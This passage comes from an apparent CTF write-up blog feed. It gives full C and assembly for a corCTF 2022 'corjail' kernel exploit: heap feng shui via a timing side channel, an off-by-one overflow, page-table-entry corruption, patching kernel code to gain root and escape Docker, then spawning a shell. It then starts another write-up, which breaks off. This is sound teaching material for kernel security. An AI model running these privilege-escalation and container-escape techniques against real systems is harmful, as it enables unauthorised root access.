class="collapsable-code__title">corCTF2022-corjail-escape_docker.asm</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>// Compiled using https://defuse.ca/online-x86-assembler.htm // We need `endbr64` if CFI is enabled (check out https://en.wikipedia.org/wiki/Control-flow_integrity and https://en.wikipedia.org/wiki/Indirect_branch_tracking) call get_rip; get_rip: pop r15; sub r15, 0x252f0; // &amp;__x64_sys_modify_ldt - kbase == 0x252f0 sub r15, 5; // call get_rip; takes 5 bytes // call commit_creds(&amp;init_cred); lea rdi, [r15 + 0x145a960]; // &amp;init_cred - kbase == 0x145a960 lea rax, [r15 + 0xeba40]; // &amp;commit_creds - kbase == 0xeba40 call rax; // task = find_task_by_vpid(1); // call switch_task_namespaces(task, &amp;init_nsproxy); mov rdi, 1; lea rax, [r15 + 0xe4fc0]; // &amp;find_task_by_vpid - kbase == 0xe4fc0 call rax; // find_task_by_vpid(1) mov rdi, rax; // task lea rsi, [r15 + 0x145a720]; // &amp;init_nsproxy - kbase == 0x145a720 lea rax, [r15 + 0xea4e0]; // &amp;switch_task_namespaces - kbase == 0xea4e0 call rax; // switch_task_namespaces(task, &amp;init_nsproxy); // current = find_task_by_vpid(pid); // current-&gt;fs = copy_fs_struct(&amp;init_fs); lea rdi, [r15 + 0x1589740]; // &amp;init_fs - kbase == 0x1589740 lea rax, [r15 + 0x2e7350]; // &amp;copy_fs_struct - kbase == 0x2e7350 call rax; // copy_fs_struct(&amp;init_fs); mov rbx, rax; // new_fs mov rdi, 0x1111111111111111; // pid: will be fiexed lea rax, [r15 + 0xe4fc0]; // &amp;find_task_by_vpid - kbase == 0xe4fc0 call rax; // current = find_task_by_vpid(pid) mov [rax + 0x6e0], rbx; // current-&gt;fs = new_fs // bypass kpti xor rax, rax; mov [rsp + 0x00], rax; mov [rsp + 0x08], rax; mov rax, 0x2222222222222222; // user_ip: will be fixed mov [rsp + 0x10], rax; mov rax, 0x3333333333333333; // user_cs: will be fixed mov [rsp + 0x18], rax; mov rax, 0x4444444444444444; // user_rflags: will be fixed mov [rsp + 0x20], rax; mov rax, 0x5555555555555555; // user_sp: will be fixed mov [rsp + 0x28], rax; mov rax, 0x6666666666666666; // user_ss: will be fixed mov [rsp + 0x30], rax; lea rax, [r15 + 0xc00f06]; // bypass_kpti - kbase == 0xc00f06; bypass_kpti is in swapgs_restore_regs_and_return_to_usermode jmp rax; // bypass_kpti</code></pre></div> <h2 id="exploit-code">Exploit code</h2> <div class="collapsable-code"> <input id="184976253" type="checkbox" checked /> <label for="184976253"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">corCTF2022-corjail-exploit.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#define _GNU_SOURCE #include &lt;fcntl.h&gt; #include &lt;linux/keyctl.h&gt; #include &lt;poll.h&gt; #include &lt;pthread.h&gt; #include &lt;sched.h&gt; #include &lt;stdarg.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;sys/mman.h&gt; #include &lt;sys/syscall.h&gt; #include &lt;sys/wait.h&gt; #include &lt;syscall.h&gt; #include &lt;unistd.h&gt; #define KERNEL_BASE_START 0xffffffff81000000 #define KERNEL_BASE_END 0xffffffffc0000000 #define KERNEL_BASE_MASK (~0x00000000000fffff) #define IS_IN_KERNEL_RANGE(addr) \ ((addr) &gt;= KERNEL_BASE_START &amp;&amp; (addr) &lt; KERNEL_BASE_END) #define _PAGE_PRESENT (1ULL &lt;&lt; 0) // Page is present in memory #define _PAGE_RW (1ULL &lt;&lt; 1) // Read/Write permission (1: writable) #define _PAGE_USER (1ULL &lt;&lt; 2) // User/Supervisor mode (1: user-accessible) #define _PAGE_PWT (1ULL &lt;&lt; 3) // Page Write-Through (1: write-through enabled) #define _PAGE_PCD (1ULL &lt;&lt; 4) // Page Cache Disable (1: caching disabled) #define _PAGE_ACCESSED (1ULL &lt;&lt; 5) // Accessed bit (1: page has been accessed) #define _PAGE_DIRTY (1ULL &lt;&lt; 6) // Dirty bit (1: page has been modified) #define _PAGE_PSE \ (1ULL &lt;&lt; 7) // Page Size Extension (1: 2MB/1GB page, 0: 4KB page) #define _PAGE_GLOBAL \ (1ULL &lt;&lt; 8) // Global page (1: remains in TLB across context switches) #define _PAGE_NX (1ULL &lt;&lt; 63) // No-Execute bit (1: execution is prohibited) #define PTE_FLAGS_MASK \ 0xFFF0000000000FFFULL // Mask to extract the lower 12-bit flag field #define PTE_PFN_MASK \ (~PTE_FLAGS_MASK) // Mask to extract the PFN (Page Frame Number) // Macro to extract the PFN from a PTE #define PTE_TO_PFN(pte) (((pte) &amp; PTE_PFN_MASK) &gt;&gt; PAGE_SHIFT) #define PAGE_DEFAULT_FLAGS \ (_PAGE_PRESENT | _PAGE_RW | _PAGE_USER | _PAGE_ACCESSED) // Cache utils from https://github.com/isec-tugraz/SLUBStick #ifndef HIDEMINMAX #define MAX(X, Y) (((X) &gt; (Y)) ? (X) : (Y)) #define MIN(X, Y) (((X) &lt; (Y)) ? (X) : (Y)) #endif static size_t rdtsc(void); static inline size_t rdtsc_nofence(void) { return rdtsc(); size_t a, d; asm volatile(&#34;rdtsc&#34; : &#34;=a&#34;(a), &#34;=d&#34;(d)); a = (d &lt;&lt; 32) | a; return a; } static inline size_t rdtsc(void) { size_t a, d; asm volatile(&#34;mfence&#34;); asm volatile(&#34;rdtsc&#34; : &#34;=a&#34;(a), &#34;=d&#34;(d)); a = (d &lt;&lt; 32) | a; asm volatile(&#34;mfence&#34;); return a; } static inline size_t rdtsc_begin(void) { size_t a, d; asm volatile(&#34;mfence&#34;); asm volatile(&#34;rdtsc&#34; : &#34;=a&#34;(a), &#34;=d&#34;(d)); a = (d &lt;&lt; 32) | a; asm volatile(&#34;lfence&#34;); return a; } static inline size_t rdtsc_end(void) { size_t a, d; asm volatile(&#34;lfence&#34;); asm volatile(&#34;rdtsc&#34; : &#34;=a&#34;(a), &#34;=d&#34;(d)); a = (d &lt;&lt; 32) | a; asm volatile(&#34;mfence&#34;); return a; } void pin_to_core(size_t core); static void get_enter_to_continue(const char *msg); static void fatal(const char *msg); void pin_to_core(size_t core) { cpu_set_t target_cpu; CPU_ZERO(&amp;target_cpu); CPU_SET(core, &amp;target_cpu); if (sched_setaffinity(0, sizeof(cpu_set_t), &amp;target_cpu)) { fatal(&#34;sched_setaffinity&#34;); } } static void get_enter_to_continue(const char *msg) { puts(msg); getchar(); } static void fatal(const char *msg) { perror(msg); // get_enter_to_continue(&#34;Press enter to exit...&#34;); exit(-1); } /** * type must be &#34;keyring&#34;, &#34;user&#34;, &#34;logon&#34;, or &#34;big_key&#34; */ static int32_t sys_add_key(const char *type, const char *desc, const void *payload, size_t plen, int ringid); static int32_t sys_keyctl(int cmd, ...); static int32_t sys_revoke_key(int32_t key); static int32_t sys_update_key(int32_t key, void *payload, size_t size); static int32_t sys_read_key(int32_t key, char *buf, size_t size); static int32_t sys_add_key(const char *type, const char *desc, const void *payload, size_t plen, int ringid) { return syscall(__NR_add_key, type, desc, payload, plen, ringid); } static int32_t sys_keyctl(int cmd, ...) { va_list ap; long arg2, arg3, arg4, arg5; va_start(ap, cmd); arg2 = va_arg(ap, long); arg3 = va_arg(ap, long); arg4 = va_arg(ap, long); arg5 = va_arg(ap, long); va_end(ap); return syscall(__NR_keyctl, cmd, arg2, arg3, arg4, arg5); } static int32_t sys_revoke_key(int32_t key) { return sys_keyctl(KEYCTL_REVOKE, key); } static int32_t sys_read_key(int32_t key, char *buf, size_t size) { return sys_keyctl(KEYCTL_READ, key, buf, size); } static int32_t sys_update_key(int32_t key, void *payload, size_t size) { return sys_keyctl(KEYCTL_UPDATE, key, payload, size); } int vuln_fd; static void off_by_one_in_kmalloc_4k(void); static void off_by_one_in_kmalloc_4k(void) { char buf[0x1000]; memset(buf, 0, 0x1000); write(vuln_fd, buf, 0x1000); } #define HEAP_ALLOC_COUNT 1000 int pipe_fds[HEAP_ALLOC_COUNT][2]; int alloc_4k_pipe_at(uint64_t idx) { const size_t pipe_size = 0x1000 * 64; int *fds = pipe_fds[idx]; int res = pipe(fds); res |= (fcntl(fds[1], F_SETPIPE_SZ, pipe_size) &lt; 0); char *uniguri = &#34;UNIGURI@&#34;; const uint64_t pipe_magic = 0xdeadbeef00000000 + idx; write(fds[1], uniguri, 8); write(fds[1], &amp;pipe_magic, 8); return !res ? 0 : -1; } void close_pipe_at(size_t idx) { for (int i = 0; i &lt; 2; ++i) { if (pipe_fds[idx][i] &gt; 2) { close(pipe_fds[idx][i]); pipe_fds[idx][i] = -1; } } } size_t last_idx_in_slab[HEAP_ALLOC_COUNT]; int pipe_cnt = 0; int make_kmalloc_4k_slab_full(const int slab_cnt) { pipe_cnt = 0; int add_key_res[HEAP_ALLOC_COUNT]; size_t times[HEAP_ALLOC_COUNT] = { 0, }; const char type[] = &#34;keyring&#34;; char desc[0x1000]; memset(desc, &#39;.&#39;, sizeof(desc)); desc[sizeof(desc) - 1] = 0; size_t last = 0; memset(last_idx_in_slab, 0, sizeof(last_idx_in_slab)); size_t running = 0; int finded = 0; for (int i = 0; i &lt; HEAP_ALLOC_COUNT; ++i) { sched_yield(); int pipe_res = alloc_4k_pipe_at(i); const size_t t1 = rdtsc_begin(); sys_add_key(type, desc, NULL, 0, 0); const size_t t2 = rdtsc_end(); times[i] = t2 - t1; if (pipe_res &lt; 0) { break; } ++pipe_cnt; if (times[i] &gt; 8000 &amp;&amp; (i == 0 || times[i] - times[i - 1] &gt; 1500)) { if (last == 0) { last = i; last_idx_in_slab[running] = i; ++running; } else if (i - last == 8) { last = i; last_idx_in_slab[running] = i; ++running; } else { last = 0; running = 0; } if (running == slab_cnt) { for (int j = 0; j &lt; 8 &amp;&amp; (i + j + 1 - last) % 8 != 0; ++j) { alloc_4k_pipe_at(i + j + 1); ++pipe_cnt; } finded = 1; break; } } } return finded ? 0 : -1; } size_t victim_pipe_fds[2]; int find_overlapped_pipes() { char buf[0x20]; uint64_t *uint64_buf = (uint64_t *)buf; for (size_t i = 0; i &lt; pipe_cnt; ++i) { read(pipe_fds[i][0], buf, 0x10); int is_ok = (memcmp(buf, &#34;UNIGURI@&#34;, 8) == 0 &amp;&amp; (uint64_buf[1] &gt;&gt; 32) == 0xdeadbeef); int is_corrupted = (uint64_buf[1] == 0xdeadbeef00000000 + i); if (is_ok &amp;&amp; !is_corrupted) { victim_pipe_fds[0] = i; victim_pipe_fds[1] = uint64_buf[1] &amp; 0xffffffff; return 0; } if (!is_ok) { return -1; } } return -1; } int test_overlapped_pipes() { char tmp[0x100]; memset(tmp, 0, sizeof(tmp)); const char *test_str = &#34;UNIGURI!&#34;; const size_t test_str_len = strlen(test_str); printf(&#34; [*] Test msg(len=0x%lx): \&#34;%s\&#34;\n&#34;, test_str_len, test_str); write(pipe_fds[victim_pipe_fds[1]][1], tmp, test_str_len); strncpy(tmp, test_str, sizeof(tmp)); printf(&#34; [*] Write \&#34;%s\&#34; to pipe@%lx\n&#34;, tmp, victim_pipe_fds[0]); write(pipe_fds[victim_pipe_fds[0]][1], tmp, test_str_len); memset(tmp, 0, sizeof(tmp)); read(pipe_fds[victim_pipe_fds[1]][0], tmp, test_str_len); printf(&#34; [*] Read \&#34;%s\&#34; from pipe@%lx\n&#34;, tmp, victim_pipe_fds[1]); const int successed = !memcmp(test_str, tmp, test_str_len) ? 0 : -1; read(pipe_fds[victim_pipe_fds[0]][0], tmp, test_str_len); return successed; } #define MMAP_SPRAY_COUNT 0x1000UL #define FILE_SPRAY_COUNT (MMAP_SPRAY_COUNT / 0x10) void *mmap_addrs[MMAP_SPRAY_COUNT]; #define MMAP_SPRAT_START_ADDR 0xcafe0000UL #define MMAP_PAGE_SIZE 0x1000UL #define MMAP_SPRAT_STEP 0x10000UL #define MMAP_SPRAT_SIZE 0x10000UL void spray_ptes_target_to_victim_pipe_page() { for (int i = 0; i &lt; MMAP_SPRAY_COUNT; ++i) { mmap_addrs[i] = mmap((void *)(MMAP_SPRAT_START_ADDR + i * MMAP_SPRAT_STEP), MMAP_SPRAT_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0); if (mmap_addrs[i] == MAP_FAILED) { fatal(&#34;mmap&#34;); } } int file_fds[FILE_SPRAY_COUNT]; sched_yield(); close_pipe_at(victim_pipe_fds[1]); for (int i = 0; i &lt; FILE_SPRAY_COUNT; ++i) { file_fds[i] = open(&#34;/&#34;, O_RDONLY); if (file_fds[i] &lt; 0) { fatal(&#34;open&#34;); } } for (int i = 0; i &lt; FILE_SPRAY_COUNT; ++i) { close(file_fds[i]); } for (int i = 0; i &lt; MMAP_SPRAY_COUNT; ++i) { for (int j = 0; j &lt; MMAP_SPRAT_SIZE / MMAP_PAGE_SIZE; ++j) { uint64_t *addr = (uint64_t *)(mmap_addrs[i] + MMAP_PAGE_SIZE * j); const uint64_t val = ((uint64_t)i &lt;&lt; 32) + j * 0x01010101; *addr = val; } } } void *corrupted_mmap_addr = (void *)-1; void find_corrupted_mmap_addr() { if (corrupted_mmap_addr != (void *)-1) { return; } for (int i = 0; i &lt; MMAP_SPRAY_COUNT; ++i) { for (int j = 0; j &lt; MMAP_SPRAT_SIZE / MMAP_PAGE_SIZE; ++j) { uint64_t *addr = (uint64_t *)(mmap_addrs[i] + MMAP_PAGE_SIZE * j); const uint64_t val = ((uint64_t)i &lt;&lt; 32) + j * 0x01010101; if (*addr != val) { corrupted_mmap_addr = addr; return; } } } } uint64_t original_ptes[0x1000 / 8]; uint64_t physical_kernel_base; uint64_t default_pte_for_kernel_code; void *set_pte(uint64_t new_pte) { static uint64_t cur_offset = 0; if (cur_offset &gt;= 0x1000 * 512) { fatal(&#34;set_pte: too many modifications&#34;); } write(pipe_fds[victim_pipe_fds[0]][1], &amp;new_pte, 8); if (corrupted_mmap_addr == (void *)-1) { find_corrupted_mmap_addr(); } void *affected_addr = corrupted_mmap_addr + cur_offset; cur_offset += 0x1000; return affected_addr; } uint64_t user_cs, user_ss, user_sp, user_rflags; static void save_state() { asm(&#34;mov %[u_cs], cs;\n&#34; &#34;mov %[u_ss], ss;\n&#34; &#34;mov %[u_sp], rsp;\n&#34; &#34;pushf;\n&#34; &#34;pop %[u_rflags];\n&#34; : [u_cs] &#34;=r&#34;(user_cs), [u_ss] &#34;=r&#34;(user_ss), [u_sp] &#34;=r&#34;(user_sp), [u_rflags] &#34;=r&#34;(user_rflags)::&#34;memory&#34;); printf( &#34;[*] user_cs: 0x%lx, user_ss: 0x%lx, user_sp: 0x%lx, user_rflags: &#34; &#34;0x%lx\n&#34;, user_cs, user_ss, user_sp, user_rflags); } #define MODIFY_LDT_ADDR 0xffffffff810252f0 #define MODIFY_LDT_OFFSET (MODIFY_LDT_ADDR - KERNEL_BASE_START) uint64_t *modify_ldt_addr; uint8_t original_modify_ldt_code[0x1000]; static void get_shell() { puts(&#34;[+] Escaping docker is success&#34;); puts(&#34; [*] Restore original modify_ldt code&#34;); memcpy(modify_ldt_addr, original_modify_ldt_code, sizeof(original_modify_ldt_code) - (MODIFY_LDT_OFFSET &amp; 0xfff)); puts(&#34;[+] Get shell!&#34;); char *argv[] = {&#34;/bin/bash&#34;, NULL}; char *envp[] = {NULL}; execve(&#34;/bin/bash&#34;, argv, envp); } void patch_modify_ldt() { const uint64_t pte_for_modify_ldt = default_pte_for_kernel_code + (MODIFY_LDT_OFFSET &amp; ~(0xFFF)); modify_ldt_addr = (uint64_t *)(set_pte(pte_for_modify_ldt) + (MODIFY_LDT_OFFSET &amp; 0xfff)); /* * Below opcodes are from: * call get_rip; * get_rip: * pop r15; * sub r15, 0x252f0; // &amp;__x64_sys_modify_ldt - kbase == 0x252f0 * sub r15, 5; // call get_rip; takes 5 bytes * * // call commit_creds(&amp;init_cred); * lea rdi, [r15 + 0x145a960]; // &amp;init_cred - kbase == 0x145a960 * lea rax, [r15 + 0xeba40]; // &amp;commit_creds - kbase == 0xeba40 * call rax; * * // task = find_task_by_vpid(1); * // call switch_task_namespaces(task, &amp;init_nsproxy); * mov rdi, 1; * lea rax, [r15 + 0xe4fc0]; // &amp;find_task_by_vpid - kbase == 0xe4fc0 * call rax; // find_task_by_vpid(1) * mov rdi, rax; // task * lea rsi, [r15 + 0x145a720]; // &amp;init_nsproxy - kbase == 0x145a720 * lea rax, [r15 + 0xea4e0]; // &amp;switch_task_namespaces - kbase == 0xea4e0 * call rax; // switch_task_namespaces(task, &amp;init_nsproxy); * * // current = find_task_by_vpid(pid); * // current-&gt;fs = copy_fs_struct(&amp;init_fs); * lea rdi, [r15 + 0x1589740]; // &amp;init_fs - kbase == 0x1589740 * lea rax, [r15 + 0x2e7350]; // &amp;copy_fs_struct - kbase == 0x2e7350 * call rax; // copy_fs_struct(&amp;init_fs); * mov rbx, rax; // new_fs * mov rdi, 0x1111111111111111; // pid: will be fiexed * lea rax, [r15 + 0xe4fc0]; // &amp;find_task_by_vpid - kbase == 0xe4fc0 * call rax; // current = find_task_by_vpid(pid) * mov [rax + 0x6e0], rbx; // current-&gt;fs = new_fs * * // bypass kpti * xor rax, rax; * mov [rsp + 0x00], rax; * mov [rsp + 0x08], rax; * mov rax, 0x2222222222222222; // user_ip: will be fixed * mov [rsp + 0x10], rax; * mov rax, 0x3333333333333333; // user_cs: will be fixed * mov [rsp + 0x18], rax; * mov rax, 0x4444444444444444; // user_rflags: will be fixed * mov [rsp + 0x20], rax; * mov rax, 0x5555555555555555; // user_sp: will be fixed * mov [rsp + 0x28], rax; * mov rax, 0x6666666666666666; // user_ss: will be fixed * mov [rsp + 0x30], rax; * lea rax, [r15 + 0xc00f06]; // bypass_kpti - kbase == 0xc00f06 * jmp rax; // bypass_kpti */ uint8_t new_modify_ldt_code[] = { 0xE8, 0x00, 0x00, 0x00, 0x00, 0x41, 0x5F, 0x49, 0x81, 0xEF, 0xF0, 0x52, 0x02, 0x00, 0x49, 0x83, 0xEF, 0x05, 0x49, 0x8D, 0xBF, 0x60, 0xA9, 0x45, 0x01, 0x49, 0x8D, 0x87, 0x40, 0xBA, 0x0E, 0x00, 0xFF, 0xD0, 0x48, 0xC7, 0xC7, 0x01, 0x00, 0x00, 0x00, 0x49, 0x8D, 0x87, 0xC0, 0x4F, 0x0E, 0x00, 0xFF, 0xD0, 0x48, 0x89, 0xC7, 0x49, 0x8D, 0xB7, 0x20, 0xA7, 0x45, 0x01, 0x49, 0x8D, 0x87, 0xE0, 0xA4, 0x0E, 0x00, 0xFF, 0xD0, 0x49, 0x8D, 0xBF, 0x40, 0x97, 0x58, 0x01, 0x49, 0x8D, 0x87, 0x50, 0x73, 0x2E, 0x00, 0xFF, 0xD0, 0x48, 0x89, 0xC3, 0x48, 0xBF, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x49, 0x8D, 0x87, 0xC0, 0x4F, 0x0E, 0x00, 0xFF, 0xD0, 0x48, 0x89, 0x98, 0xE0, 0x06, 0x00, 0x00, 0x48, 0x31, 0xC0, 0x48, 0x89, 0x04, 0x24, 0x48, 0x89, 0x44, 0x24, 0x08, 0x48, 0xB8, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, 0x48, 0x89, 0x44, 0x24, 0x10, 0x48, 0xB8, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x48, 0x89, 0x44, 0x24, 0x18, 0x48, 0xB8, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x48, 0x89, 0x44, 0x24, 0x20, 0x48, 0xB8, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x48, 0x89, 0x44, 0x24, 0x28, 0x48, 0xB8, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x48, 0x89, 0x44, 0x24, 0x30, 0x49, 0x8D, 0x87, 0x06, 0x0F, 0xC0, 0x00, 0xFF, 0xE0}; uint64_t *ptr; ptr = (uint64_t *)memmem(new_modify_ldt_code, sizeof(new_modify_ldt_code), &#34;\x11\x11\x11\x11\x11\x11\x11\x11&#34;, 8); *ptr = getpid(); ptr = (uint64_t *)memmem(new_modify_ldt_code, sizeof(new_modify_ldt_code), &#34;\x22\x22\x22\x22\x22\x22\x22\x22&#34;, 8); *ptr = (uint64_t)get_shell; ptr = (uint64_t *)memmem(new_modify_ldt_code, sizeof(new_modify_ldt_code), &#34;\x33\x33\x33\x33\x33\x33\x33\x33&#34;, 8); *ptr = user_cs; ptr = (uint64_t *)memmem(new_modify_ldt_code, sizeof(new_modify_ldt_code), &#34;\x44\x44\x44\x44\x44\x44\x44\x44&#34;, 8); *ptr = user_rflags; ptr = (uint64_t *)memmem(new_modify_ldt_code, sizeof(new_modify_ldt_code), &#34;\x55\x55\x55\x55\x55\x55\x55\x55&#34;, 8); *ptr = user_sp; ptr = (uint64_t *)memmem(new_modify_ldt_code, sizeof(new_modify_ldt_code), &#34;\x66\x66\x66\x66\x66\x66\x66\x66&#34;, 8); *ptr = user_ss; memcpy(original_modify_ldt_code, modify_ldt_addr, sizeof(original_modify_ldt_code) - (MODIFY_LDT_OFFSET &amp; 0xfff)); memcpy(modify_ldt_addr, new_modify_ldt_code, sizeof(new_modify_ldt_code)); } #define SLAB_COUNT 7 int main() { pin_to_core(0); save_state(); vuln_fd = open(&#34;/proc_rw/cormon&#34;, O_RDWR); if (vuln_fd &lt; 0) { fatal(&#34;open&#34;); } void *tmpbuf = malloc(0x1000); uint64_t *uint64_tmpbuf = (uint64_t *)tmpbuf; FIRST_STEP: #define RETRY() \ do { \ for (int i = 0; i &lt; pipe_cnt; ++i) { \ close_pipe_at(i); \ } \ sched_yield(); \ puts(&#34;\n[*] Retry from first step after 1 seconds\n&#34;); \ sleep(1); \ goto FIRST_STEP; \ } while (0) puts(&#34;[*] Do side-channel for kmalloc-4k slab...&#34;); while (make_kmalloc_4k_slab_full(SLAB_COUNT) &lt; 0) { puts(&#34; [*] Retry side-channel for kmalloc-4k slab...&#34;); for (int i = 0; i &lt; pipe_cnt; ++i) { close_pipe_at(i); } sched_yield(); } puts(&#34; [+] Side-channel success&#34;); const size_t target_pipe_idx = SLAB_COUNT * 4 + 4; puts(&#34;[*] Trigger off-by-one...&#34;); sched_yield(); close_pipe_at(target_pipe_idx); off_by_one_in_kmalloc_4k(); alloc_4k_pipe_at(target_pipe_idx); sched_yield(); puts(&#34;[*] Finding overlapped pipes...&#34;); if (find_overlapped_pipes()) { puts(&#34; [-] Overlapping seems false positive&#34;); RETRY(); } printf(&#34; [+] pipe @ %lx and pipe @ %lx are overlapped!\n&#34;, victim_pipe_fds[0], victim_pipe_fds[1]); puts(&#34;[*] Test overlapped pipes&#34;); if (test_overlapped_pipes() &lt; 0) { puts(&#34; [-] Overlapping seems false positive&#34;); RETRY(); } puts(&#34; [+] Overlapping is true&#34;); puts(&#34;[*] Set pipe&#39;s offset to 0x1000 for reading PTEs&#34;); write(pipe_fds[victim_pipe_fds[0]][1], original_ptes, 0x1000); puts(&#34;[*] Spray PTEs...&#34;); spray_ptes_target_to_victim_pipe_page(); puts(&#34;[*] Read PTEs&#34;); read(pipe_fds[victim_pipe_fds[0]][0], original_ptes, 0x1000); if ((original_ptes[0] &amp; PTE_FLAGS_MASK) != 0x8000000000000867) { puts(&#34; [-] UAF page does not contain PTEs&#34;); RETRY(); } printf(&#34; [+] UAF page contains PTEs (One of them is 0x%016lx)\n&#34;, original_ptes[0]); puts(&#34;[*] Overwrite PTE to leak physical kernel base&#34;); const uint64_t new_pte_for_dmabuf = PAGE_DEFAULT_FLAGS | 0x9c000; // dmabuf..? WTF?! uint64_t *dmabuf_addr = (uint64_t *)set_pte(new_pte_for_dmabuf); find_corrupted_mmap_addr(); if (corrupted_mmap_addr == (void *)-1) { puts(&#34; [-] Corrupted mmap addr not found&#34;); RETRY(); } printf(&#34; [+] Corrupted mmap addr: %p\n&#34;, corrupted_mmap_addr); physical_kernel_base = (*dmabuf_addr &amp; PTE_PFN_MASK) - 0x2004000ULL; printf(&#34; [+] physical kernel base: 0x%016lx\n&#34;, physical_kernel_base); default_pte_for_kernel_code = physical_kernel_base | PAGE_DEFAULT_FLAGS; puts(&#34;[*] Escaping docker...&#34;); puts(&#34; [*] Patch modify_ldt&#34;); patch_modify_ldt(); puts(&#34; [*] Call patched modify_ldt...&#34;); syscall(SYS_modify_ldt); puts(&#34; [-] Failed to Escaping docker&#34;); get_enter_to_continue(&#34;Press enter to exit...&#34;); return 0; }</code></pre></div> <h2 id="reference">Reference</h2> <ul> <li><a href="https://github.com/Crusaders-of-Rust/corCTF-2022-public-challenge-archive/tree/master/pwn/corjail/task">https://github.com/Crusaders-of-Rust/corCTF-2022-public-challenge-archive/tree/master/pwn/corjail/task</a></li> <li><a href="https://gitlab.com/sajjadium/ctf-archives/-/tree/main/ctfs/corCTF/2022/pwn/CoRJail">https://gitlab.com/sajjadium/ctf-archives/-/tree/main/ctfs/corCTF/2022/pwn/CoRJail</a></li> <li><a href="https://github.com/isec-tugraz/SLUBStick">https://github.com/isec-tugraz/SLUBStick</a></li> <li><a href="https://github.com/Lotuhu/Page-UAF">https://github.com/Lotuhu/Page-UAF</a></li> <li><a href="https://ptr-yudai.hatenablog.com/entry/2023/12/07/221333">https://ptr-yudai.hatenablog.com/entry/2023/12/07/221333</a></li> </ul> AsisCTF2020Qual shared_house /posts/kernel/write-ups/ctf/asisctf2020qual-shared_house/ Thu, 27 Feb 2025 12:17:57 +0000 /posts/kernel/write-ups/ctf/asisctf2020qual-shared_house/ <hr> <h2 id="problem">Problem</h2> <h3 id="enviroment">Enviroment</h3> <ul> <li>linux version: <a href="https://elixir.bootlin.com/linux/v4.19.98/source"><code>4.19.98</code></a> <ul> <li>No SMAP</li> <li>No KPTI</li> </ul> </li> </ul> <h3 id="features">Features</h3> <p>This challenge provide simple device (it has only one function: <code>mod_ioctl</code>). And the function is like following:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">request_t</span> </span></span><span style="display:flex;"><span>{ </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">int</span> size; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">char</span> __padding0[<span style="color:#ae81ff">4</span>]; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">void</span> <span style="color:#f92672">*</span>data; </span></span><span style="display:flex;"><span>}; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>uint64_6 <span style="color:#a6e22e">mod_ioctl</span>(<span style="color:#66d9ef">struct</span> file <span style="color:#f92672">*</span>a1, <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">int</span> cmd, <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">__int64</span> arg) { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">request_t</span> req; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">copy_from_user</span>(<span style="color:#f92672">&amp;</span>req, arg, <span style="color:#ae81ff">0x10LL</span>)) <span style="color:#66d9ef">return</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">14LL</span>; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (req.size <span style="color:#f92672">&gt;</span> <span style="color:#ae81ff">0x80</span>) <span style="color:#66d9ef">return</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">22LL</span>; </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">mutex_lock</span>(<span style="color:#f92672">&amp;</span>_mutex); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (cmd <span style="color:#f92672">==</span> <span style="color:#ae81ff">0xC12ED002</span>) { <span style="color:#75715e">// cmd == 0xC12ED002: delete_note </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span> <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span>note) { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">goto</span> ERROR; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">kfree</span>(note); </span></span><span style="display:flex;"><span> note <span style="color:#f92672">=</span> <span style="color:#ae81ff">0LL</span>; </span></span><span style="display:flex;"><span> } <span style="color:#66d9ef">else</span> <span style="color:#66d9ef">if</span> (cmd <span style="color:#f92672">==</span> <span style="color:#ae81ff">0xC12ED001</span>) { <span style="color:#75715e">// cmd == 0xC12ED001: alloc_new_note </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span> <span style="color:#66d9ef">if</span> (note) <span style="color:#a6e22e">kfree</span>(note); </span></span><span style="display:flex;"><span> size <span style="color:#f92672">=</span> req.size; </span></span><span style="display:flex;"><span> note <span style="color:#f92672">=</span> (<span style="color:#66d9ef">char</span> <span style="color:#f92672">*</span>)<span style="color:#a6e22e">_kmalloc</span>(req.size, <span style="color:#ae81ff">0x6080C0LL</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span>note) <span style="color:#66d9ef">goto</span> ERROR; </span></span><span style="display:flex;"><span> } <span style="color:#66d9ef">else</span> <span style="color:#66d9ef">if</span> (cmd <span style="color:#f92672">==</span> <span style="color:#ae81ff">0xC12ED003</span>) { <span style="color:#75715e">// cmd == 0xC12ED003: write_note </span></span></span><span 